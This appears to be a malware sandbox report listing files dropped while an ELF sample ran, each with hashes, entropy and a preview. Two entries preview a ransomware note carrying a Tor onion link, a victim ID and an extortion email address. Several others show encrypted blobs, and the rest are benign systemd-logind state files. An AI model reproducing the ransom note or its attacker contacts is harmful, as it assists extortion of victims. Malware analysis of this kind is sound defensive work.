                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Reputation:low
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.624071099478406
                                Encrypted:false
                                SSDEEP:3:Kkll3ll/lsl5ll8jf4WYTcT+Q/p4QbBgBgao/WKqkzlazrT31zAn:KnUvhd9gBgao/Fqkcj31E
                                MD5:2E3962C505E0A30814DAF97B8A5F1C42
                                SHA1:F4E4431E8D46E583CF21958682AD50E61EA64A53
                                SHA-256:CCE22D85E28C43486B020D144BE13C575A6641FA36A50ECB7FBA797909E34630
                                SHA-512:87B9EB3F9AA751A7ABE8B2CCE2A8867BCDF1C63D1661A5AC3E288234683CA8F5184A8484CDAC5444B44A18D8BB2EC9F2281F1B7A38BDE9D1BB774545C83B6180
                                Malicious:false
                                Reputation:low
                                Preview:.8...!2A........(...........................g..g*..\$j..}H.......V. ..[.*....g.>..R...u4..$Hz7s.kM..#..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.684033208915283
                                Encrypted:false
                                SSDEEP:3:wLXu/3ll/lsl5ll9/N0TLTWVJ6ANyOOhyvKqkzlazrT31zAn:wLX1TSKj6ANBdyqkcj31E
                                MD5:18673020488C57386446C9BDD67023E7
                                SHA1:E01C47A25C9661EFA2746A112447303EB7BB24B6
                                SHA-256:EFB42B5EB1A3F9F271D97CDFD00AFC9780F40B407057DA48FD764497F82749DC
                                SHA-512:59D8CFFD2CDA030CC5B2DC714288F0724BAA83C635E6316CBFAF91DFB80E22FA53E42D77517BD579BDB23094F5820E6B5306BD0BAA7B2CF3F5C50F45BAEA5303
                                Malicious:false
                                Preview:.p..!2A........(...............................C.L..(.0.....:....b..Q..W.K)....!...s..C..$q..7.2C..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):271
                                Entropy (8bit):6.771085965798113
                                Encrypted:false
                                SSDEEP:6:HywDtbcPe0LQmtJHzeVyf+G+ERbblEbeNsqkcj31E:HxDtbGJHSilpSTcO
                                MD5:6019CF7FA208436C5312C4863E732EC6
                                SHA1:89D9F09B7AC73A4A0E0573174282075EEB3C05D1
                                SHA-256:6A8854E1999F0F63945047B582CF89D7B4676DED5AD098B8B3F9F12E4D31C37E
                                SHA-512:91A414DF88CC486D062EED9374BA059884CE10A63BCACBCA3BF0AED3F7467012910FAE5C0451E1FFAE3E9CB857254A75FF88224E5F3298BAEDD263AD442149C6
                                Malicious:false
                                Preview:.....$.,f......%a.!){....a.ac...A9..b5..U.xw=..d..3.]....1.....V{/>..2lVU.\r..u.v..L.:..4)a.l..4....B......JN.j.CJ.K.....&.1.......!2A........(..............................C..+#..p.=N..<!.*o~......)]....D.Q......n7.+[.8../.......WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):141
                                Entropy (8bit):5.641537923739266
                                Encrypted:false
                                SSDEEP:3:AFn/3ll/lsloltaEhfjSManGJDicOhkhJKqkzlazrT31zAn:Ad647kxb/hvqkcj31E
                                MD5:B202C34CC3BDE8E10E4992BF00C7BA84
                                SHA1:715429D1F19B115F4C4A9BBC52CB1F8847B7496C
                                SHA-256:BDCAF10B8C87C08A1C48B66F5837A34B291401557051056C9A88C2483AA76D9B
                                SHA-512:C3E01B908BEC05D3DD1116C27385752239EFDEECA6566EFFC8CD4C9742893012B9BD816C3FC19D2648EFD1FD0C6FA8E6807BE4766EA991EB83C8196765238AC3
                                Malicious:false
                                Preview:..-{.!2A........(...............................J..|:....-,.2y...}MSd@..#/';..VLQ.-.n..........(....J..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.764355441042688
                                Encrypted:false
                                SSDEEP:3:y00n/3ll/lsl5llkx/7jzD5yAAkYG98O/b0OhyRJKqkzlazrT31zAn:y00n6yvAkxuCbRkyqkcj31E
                                MD5:C8EEE84546EFE567FD16AEB97DBC6A58
                                SHA1:C6EF86C4E56A137B6CC8A6E8BCC2D1C86EAAB61F
                                SHA-256:0C2FEB057BD945BEAF8F392CAB6E1CD1488BECA280B1FE8EF2A152B520FD5DD6
                                SHA-512:96720206B4AB8C27A9DCAD28121758285F296B5DA52BD7E5111101EDC0F6A5773D0DF41703F106A090D7F4A0ECDBD954D9C5265C81B8370B245682AC837F1E4F
                                Malicious:false
                                Preview:.n"..!2A........(...........................e.|AP........$.G....."..W....#N-.d..... .}...C...*I.B."~...WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):158
                                Entropy (8bit):5.88058898781548
                                Encrypted:false
                                SSDEEP:3:gR8e3Za3ll/lslrl6QJc3KVCtM0rIdiiGpdKqkzlazrT31zAn:gCejo7P7rIppqkcj31E
                                MD5:DE7F71DA11D0CF7FF62EC78DADBF6E92
                                SHA1:2D8673FA2A30DC9E33E62D71894A6730C811BB1E
                                SHA-256:71FE52F4DB7C8BF27233B1BADBEA7EE9D38FE18ABA7AF6F75BA31FF037A255E5
                                SHA-512:89CCB48C66334230433B5EDF9EC23FE3EBE8EB0DA640D25EEFDD8E2D825243351C2C7BD4BF37B94521D48F4C4C843A5651CE5C503AE909D2C5C32334EFC38070
                                Malicious:false
                                Preview:.(Zmd..T.p...P...X4.F.!2A........(...........................r.0..ab..k.!..CY"..6.....(B.]....?................4KY...l..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.7446776731700915
                                Encrypted:false
                                SSDEEP:3:hz/3ll/lsl5llMgN+/WD4IUtB8X/rtSl8jPAfKqkzlazrT31zAn:kNN+/LB8X/yiqkcj31E
                                MD5:1B6E868027D3A998A7769D67A3932114
                                SHA1:8D4F7BB7A0473957E6F2A9681FFA67BB52D6FACD
                                SHA-256:ABCD870C61FE9DDFD59CC641EDDE3ABB2DA4AEEEED3990D2F4725496EEEA396A
                                SHA-512:A73C40AF53929A2F4A75A8AB0DF8A4B204F04ED8977F1F2A737CCD299E4DFEE7D79D71D064254385DA5F57AF17D7EEC6FC584A08F3BB4409EBDF2829F6E64319
                                Malicious:false
                                Preview:.....!2A........(...........................4+.n'.hy..2Z;.D.@s..>..w..w2.....!HE.!Sl."y...7.c.b.......WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):249
                                Entropy (8bit):5.1334532270294
                                Encrypted:false
                                SSDEEP:6:SbFuFyL8NEL1QXccIRI/cIlG/cI/0tmWvyPXaLX6zpp7Rl:qgFqXQXTI1IltIQvEy0Rl
                                MD5:AF66846AF74C40610BAFB25EE938E4A4
                                SHA1:FE0B6DDD55722B8EF394C736B3868CFF6744AADB
                                SHA-256:BD8502E132D917AEBA0DBEC8BC8A7577225E2292D5DFCA93E7BF8E9676749D7E
                                SHA-512:382125456440D04D4C16AEAF60066659FEFC4F14AF76A215901DD2AC13E1C24FB37F0C13BA9BD5CE7D32633544658FB855834084CC69576FEEEBF96BBB7D9EDD
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=handle-power-key:handle-suspend-key:handle-hibernate-key:handle-lid-switch.MODE=block.UID=1000.PID=2123.WHO=xfce4-power-manager.WHY=xfce4-power-manager handles these events.FIFO=/run/systemd/inhibit/10.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):163
                                Entropy (8bit):4.963022897344031
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                                MD5:740A3D9E5BDC608745C17F00098F3B54
                                SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                                SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                                SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):204
                                Entropy (8bit):4.981193950793451
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWNQK4wq29ifx+q+zgCtkBFqG8QCfA/dcvWZ47tX8/SfWADv:SbFuFyL8KQKeLfUq6gckMQ22dKWZAlRT
                                MD5:A1C4614191983B812562258CC03B7BB1
                                SHA1:1B6B9CE5685DDE148191EB555E97315711649F50
                                SHA-256:7AFBD3A498991585285E7B73720083EAFC602DD1310D179FF8C3772F98E21134
                                SHA-512:A16EF07B928AFE1779BA2E154641039206ECA3F219DE48163D31BFC91FD4313DADAF771EE4269E3CC03B89C81C759A28310BD24D701E5B3DBF8036C226B4B325
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=shutdown.MODE=delay.UID=0.PID=884.WHO=Unattended Upgrades Shutdown.WHY=Stop ongoing upgrades or perform upgrades before shutdown.FIFO=/run/systemd/inhibit/3.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):143
                                Entropy (8bit):5.109910338925392
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifSU1IppTMXSHK72X8/SflY:SbFuFyL8OAApfZApLHK7wRS
                                MD5:E374D3E418E44E444D586B8A667BA7B9
                                SHA1:10E313EA3C86F242B0921AB80E794817F858DE3C
                                SHA-256:E3C381103F615FE4A0F85F9F07DBD40A4E8DB91EAA187D48472C7EEC6772C23C
                                SHA-512:42AD26F8C651EF390A526392C492526AA81919D09085D7DB9A6DE067AADEE06AA8E908638667AFAE1A79F2C632E430868E9D87D36BF45DE0E708BFE83993E991
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):198
                                Entropy (8bit):5.229502665506919
                                Encrypted:false
                                SSDEEP:6:SbFuFyL8NEL1QXccIRI/cIlGjdC+5rqKLXv0R5:qgFqXQXTI1Il0qKjcR5
                                MD5:65D49247D84F1F59B04E2D62ACBF37DF
                                SHA1:0769B6966C4C44D013DCD3ADD8297BBD3712BF05
                                SHA-256:3F5664EB8E0E6A758DE79C7731E3CEC1C794732476C842DD057932D67D3812D5
                                SHA-512:E1B4834B171FF12BD80BCD5261E3EEAABD61766CC6A3BFFD8195A0C87345601207257B0B1CF03388B494523AE1FA6BDFFB82EFE25E885A3E8BB5824A04F8702D
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=handle-power-key:handle-suspend-key:handle-hibernate-key.MODE=block.UID=127.PID=1648.WHO=gdm.WHY=GNOME handling keypresses.FIFO=/run/systemd/inhibit/5.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):147
                                Entropy (8bit):5.1669277917692895
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9c+5ViXoqKZLXviX8/SfI:SbFuFyL8OAAx+5rqKLXv0RI
                                MD5:95B4BEB9E23C631D44BA23687078DEAB
                                SHA1:E8858CA80C412C790D383760A0CD031213EF30A2
                                SHA-256:3A02E7AD5FD819002373D84A62069BE9522E9F994400633DD477B4789C0616C0
                                SHA-512:BA3AB070840AD50CA3A630455B351ECE9CB2D89E6C32FA0C43BA869AF571AE8D63AE83AF95742A145DE89B095D1BC64BC0682995FDC56FE95A3BC3439DF2F732
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=127.PID=1648.WHO=gdm.WHY=GNOME handling keypresses.FIFO=/run/systemd/inhibit/6.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):152
                                Entropy (8bit):5.138883971711133
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9c+5lyiiXulpv5RX8/Sffn:SbFuFyL8OAAx+5lNlpLRfn
                                MD5:9921B6FC71927A90C0CEB5BCA4748393
                                SHA1:0376F45428203428F5E9C156A981044E2D66333C
                                SHA-256:EB6B7209CD410B6CC4E42E26224BEC45C9935357F5574FB2B8DCBDFB955BAFA6
                                SHA-512:279E8A47E3A3269CF04ABEA70CC4E92FCEBE56F1A9D1539C1D6BF9085F876A2C740C940DF5018E396C6CA463A71BE0B71DB90E0D699B4398E38FA72B55BE563C
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=127.PID=1668.WHO=gdm.WHY=GNOME needs to lock the screen.FIFO=/run/systemd/inhibit/7.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):164
                                Entropy (8bit):5.11427950700706
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9hFfy3GXA6wTgvWvVZX8/Sf+Dvn:SbFuFyL8OAAKfy3GXxVWNpR+z
                                MD5:A2809D1B173C22623712906FBB235B53
                                SHA1:8D1481F5BA5D1F7FC25FF2CD90B553A9D92DF84B
                                SHA-256:DF533496FEFF7669BA95EFA1AA09BCBEF7440FCA20042DA62231C1E6D5F2365D
                                SHA-512:8FBC45A480B6FB4FD3CDCD2D94209B551F3C0B7C8F94AC57F6B00FA9D156D3A7D6A586F213F613A3726EB227348EEC42B7D209274AB3D8111C1C4F7AD07370E6
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=1000.PID=2028.WHO=xfce4-screensaver.WHY=Locking screen before sleep.FIFO=/run/systemd/inhibit/8.ref.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):95
                                Entropy (8bit):4.921230646592726
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+v:SbFuFyLwH47Pg20ggWv
                                MD5:BE58CCABC942125F5E27AF6EB1BA2F88
                                SHA1:07C20F55E36EE48869B223B8FC4DBC227C7353AC
                                SHA-256:551B1D1C8E5953D5D0CF49C83C1568E2FBEF8BDDB69903B3DA82240B777B4629
                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                Malicious:false
                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):116
                                Entropy (8bit):4.957035419463244
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+ugKQ2KwshcXSv:SbFuFyLwH47Pg20ggWunQ2rNXc
                                MD5:66D114877B3B4DB3BDD8A3AD4F5E7421
                                SHA1:62E0CB0F51E0E3F97BE251CB917968DFF69ED344
                                SHA-256:A922628916A7DDBE2BAA33F421C82250527EA3C28E429749353A1C75C0C18860
                                SHA-512:5651247FA236DCF020A3C8456E4A9A74A85C5B9B3CCE94A3CF8F85FD4D66465C9F97DF7A1822E6CA4553C02BE149F3021D58DCC0C8CB6DCF37F915BD0A158187
                                Malicious:false
                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):282
                                Entropy (8bit):5.279590293533198
                                Encrypted:false
                                SSDEEP:6:SbFuFyL3BVgVuR257iesnAir/0IxffhTgFeV9VQ2thQc2pb02/g2p9rwB:qgFq30VuR8L/ibBhgIV9JthQHtPYq9M
                                MD5:6B21982BCD5585E718C406167E20B59E
                                SHA1:5D2F5FFE0E90CC0AFE2798FA63C02CF8D8D6CF6B
                                SHA-256:8A0C7B3BEAE9BE0AE115616F1F148B7ADA0BC828D5350C08C2202D0178A2B638
                                SHA-512:901BDBE2704C8ED05CC6AF60E57661A44CB89F465C1047BF78A184547B091766CDADC621A25FE77E043FB646705FD45BF75CD5B02DA2EE34EF53FBDC33AC00C3
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11918.REALTIME=1730729883282672.MONOTONIC=427082307.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):188
                                Entropy (8bit):4.928997328913428
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs5BuSgVuMI2sKiYiesnAv/XS12K2hwEY8mTQ2pJi22sQ2KkmD2pi:SbFuFyL3BVgVuR257iesnAi12thQc2p4
                                MD5:065A3AD1A34A9903F536410ECA748105
                                SHA1:21CD684DF60D569FA96EEEB66A0819EAC1B2B1A4
                                SHA-256:E80554BF0FF4E32C61D4FA3054F8EFB27A26F1C37C91AE4EA94445C400693941
                                SHA-512:DB3C42E893640BAEE9F0001BDE6E93ED40CC33198AC2B47328F577D3C71E2C2E986AAAFEF5BD8ADBC639B5C24ADF715D87034AE24B697331FF6FEC5962630064
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):223
                                Entropy (8bit):5.463137079838033
                                Encrypted:false
                                SSDEEP:6:SbFuFyL3BVgdL87ynAir/0IxffqgFeV9Rt6fr:qgFq30dABibBigIV9RIfr
                                MD5:8D0867B441C73D320461B346F46539C2
                                SHA1:8416B47417BB4BC9B1B7A99AC6B279AA46AE3BC6
                                SHA-256:5CCC79488023D8289728EDB103FAE812A93CB3F234539A974E897EB435A29572
                                SHA-512:A70A70EBBCC40CF2718CBDFBB4E0B47BC66208762FB20680FE64BE0F48596192400D3BFBBA24F113B45EEBF661BA37C85732D95C6E24027050B5B82779A40A7A
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11980.REALTIME=1730729883282672.MONOTONIC=427082307.LAST_SESSION_TIMESTAMP=427172954.
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):174
                                Entropy (8bit):5.294944126693173
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs5BuSgdNR2sKiYiesnAv/XSHxJgFVoVegq+WkKo206qod5UkcQJn:SbFuFyL3BVgdL87iesnAiRJgFeV9Rt6z
                                MD5:7D4B5D9AA6BA025B20F157EEED5A45D1
                                SHA1:A8314EEBC2A1119D732BC9CDDB995AC411691C3F
                                SHA-256:39466696F27D21069259164FD0A6E68034A5ACB8555E7D63810AD88FDAAF5126
                                SHA-512:727726F047C824C49BC128371B89730CA6B54C23BB59D7CCB1D87F0A41A92BD1A89D2A12BF73BA76A4F2C283D70BBE29CA9F78179FF039CCACCC3FD4E9EAB814
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=no.RUNTIME=/run/user/127.REALTIME=1730729883282672.MONOTONIC=427082307.LAST_SESSION_TIMESTAMP=427172954.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):462
                                Entropy (8bit):7.396383360371341
                                Encrypted:false
                                SSDEEP:12:ad9N6PjjIm5HPCDxtfLUYJiDTbi17YTcO:XPcaXDqO
                                MD5:5C1D7B5667C2E57145DDFBD87D6BDABC
                                SHA1:BBA8A700E3768855E22C64C3A376D15201655D86
                                SHA-256:DBB1A6B1CEB185138A12197FE32199CB70ED70C495748A432952663722BF18BD
                                SHA-512:FBED07CC08C3CC2C7966E87172B95D6C86F793C7287D31006E7EEF960B8148343ACB150103B623A954C9EBC07C6FF29BAAB5CDFF927A6E54F991FCEC8A6B1B2D
                                Malicious:false
                                Preview:V...=A.B'....;....n.D+h....$H..'hfS.............D#....o?...A.K7....'G.mQ.x._.._3J.d`.>J...I$x..^N.\...V...S..4...I...`%~...6..n./.+XW..MAa..A.=.}N..h..W...RO.].....j.X1.7.& .."...^.D...6!k.Z.3../..I.9lC...>.v.+.%;/1..J9o.I.d...B..0fu.s...?I.I)..Gf[(O.8.@q....N.f.~......H$s.{.z....#.Wo.Z.R..P.....J.?.<...!2A........(...................F........B..h....C. u.j...K....Q B.^.F.>.b...t.......i..`.l....F..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):138
                                Entropy (8bit):5.685807260226307
                                Encrypted:false
                                SSDEEP:3:cl3ll/lslHlj6lY5b0R/NesG/RqqwPlq6KqkzlazrT31zAn:XMC5I7NG/MJwqkcj31E
                                MD5:3C82A8294591FAA80F5A7CBF0587F9AC
                                SHA1:452CE410CDADBCA097E1DE8E4D2AF69ADD24C99B
                                SHA-256:75B236EE7C2DD53D76CC7E352C5DAA9158C3E73A7173BFAB1BCE1C7739CDDD9B
                                SHA-512:760A4C982E7C8B78467099B6A2B12CE63591910138CD1AB484F85A8AB845E9245E9D528DA3DB2AA402742A4C0E10C9222AC4A4804CABB991A78F7DED8684F2D3
                                Malicious:false
                                Preview:m..!2A........(................................r.*........W.K.=...I.&.q..7.}..(..Z.=.O3]......*.#j@.,E..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):6.327796569081835
                                Encrypted:false
                                SSDEEP:3:5vz2wegN6+D/+43exuG54bvGeBn:Fz2weg0+D26eJ54bv5B
                                MD5:ACD99E99906CD2F6E50B613FDB1F4F63
                                SHA1:B3797FE1BF63235866D6F9C5FC05BA3A73B68A01
                                SHA-256:C06F3D22E6C3066355D6F6FBC18573F80DEA8E3B3E3792EEC31B66896FBB75F5
                                SHA-512:B4E91B0BCED48B69336CD50779893EC7754CDCBCB8804B32508A634AC1F6B1DF02CD7309D3FD514762C0E0A3433DF34632953DE9CD1A9DE0733A158C182EC84B
                                Malicious:false
                                Preview:.6....y.b!.g.\.U;Ep.}.......#^.....%"...8*..lj..A.@...a.Xh5.../.$..33....J.;..~.S..]..a.j2/y(......
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):2.321928094887362
                                Encrypted:false
                                SSDEEP:3:cJ:cJ
                                MD5:C8037FEC3A7C9DD631FE850CEDA403FC
                                SHA1:E463D3DDDBDACF8E4585F86EB4E8FB7F85AEBDBF
                                SHA-256:8D685D30F9A35A21BDCEF69463CDBA0C4FBF3B1A856D6EE242EAC3C135F97E24
                                SHA-512:7334BB7C37253A78061C4152AF6ADD9709FAB63398D4FA7476D0E6036B9D2F9297C28AB89F8D1A491C15AA85247BD49E10DE679362EC7EEE58714D16859B292F
                                Malicious:false
                                Preview:6324.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):788
                                Entropy (8bit):7.64058962274705
                                Encrypted:false
                                SSDEEP:24:Fp2hwYT0pvZX08umxEUC/Diw2dfgc8yuvO:Fp2aYT01RuQCS58yuvO
                                MD5:F2E5CED3C9662F8C7C6DA7BA1F4D1907
                                SHA1:992FE6D1F25D6357AC3408DE44E90D2EFAC672D8
                                SHA-256:512F64E6656DE0256971D35688CCED0564AEEA6F3FE4023CAD3816FE993CCC54
                                SHA-512:D37DE51DD207487991DDEA57F6CC05DCFDC654E92C1216327F357B42EDC97C7F81AEEA5977C47AECAF70CBB5D046607B1564412D222DC565F9E4D5CF93651F02
                                Malicious:false
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):138
                                Entropy (8bit):5.605955448569395
                                Encrypted:false
                                SSDEEP:3:Hr/3ll/lslHluApaC7FeGIKpAG1fDP6eRJKqkzlazrT31zAn:+sAH7sG//pPFyqkcj31E
                                MD5:4758B5D8D841D842EB1FB890D50CCBE6
                                SHA1:89DF3944BD8210A6C2BE76100232B298A93EE367
                                SHA-256:4B2353F7A36B0266C14F300A61894913CC018A04C95E2F0BC95B78949446E90F
                                SHA-512:E5C3E8291054225462997C479C9D9F055C71F32E47F4A0452C72E446D4F5E6DC7CA4F0668D05004FEF3AC74CFC13400039E30DC25FDD0FED56F782DA0554E1AB
                                Malicious:false
                                Preview:.'.!2A........(.............................d[._M..oT/d.H...p..f.....^c.._\...?.Hy.eS.kr.Y.....A#.&*)..WRD...&..}{..?.X.#..6..../Q.D3$.
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):6.327796569081834
                                Encrypted:false
                                SSDEEP:3:0eqn7QpgdBssDlcm38NPe4dS95WviloPYGhTOi5MQqn:pq7QpgDsMG5Pe4dS4aNGhTOiW
                                MD5:83B93C614F80A657CF6949E9C5865B9F
                                SHA1:71F24976BFFA9CD70AC148027C978F29911C0397
                                SHA-256:798D2A7B360225CBD9AF5CD88D235FFFCF16E27378262FF8E89A1ADD75741FDE
                                SHA-512:88F3D7B4034ACE28B2C82DD87BA92A0725A440ECED086F6E7E925B8C58FE56D7389EFA8BA6328885745111C28E8756CD77B3B4EA0B2E3281E0833984D42DAFA1
                                Malicious:false
                                Preview:_|B6..8?{.T...m.A..c..h4$Ip.<.@-...y.7...G9...`R|..-....}.x">iv..X..o.]>..G.F..=`F..<.....[t$!..&.)..
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):137
                                Entropy (8bit):5.62113446891558
                                Encrypted:false
                                SSDEEP:3:bkn/3ll/lslslCVh8fblat99kpY+JuqxSvKqkzlazrT31zAn:An6ECLFt99kVxPqkcj31E
                                MD5:3339658B002709C9CF05437103C75EF0
                                SHA1:E40A1E475BEAF09927721AF6FA2E168C4D6CF1B7
                                SHA-256:6404A7B1E3CEC9F7CD66B92D37AFFC7286BE5D4FC39CBDE750CFC62529E1B789
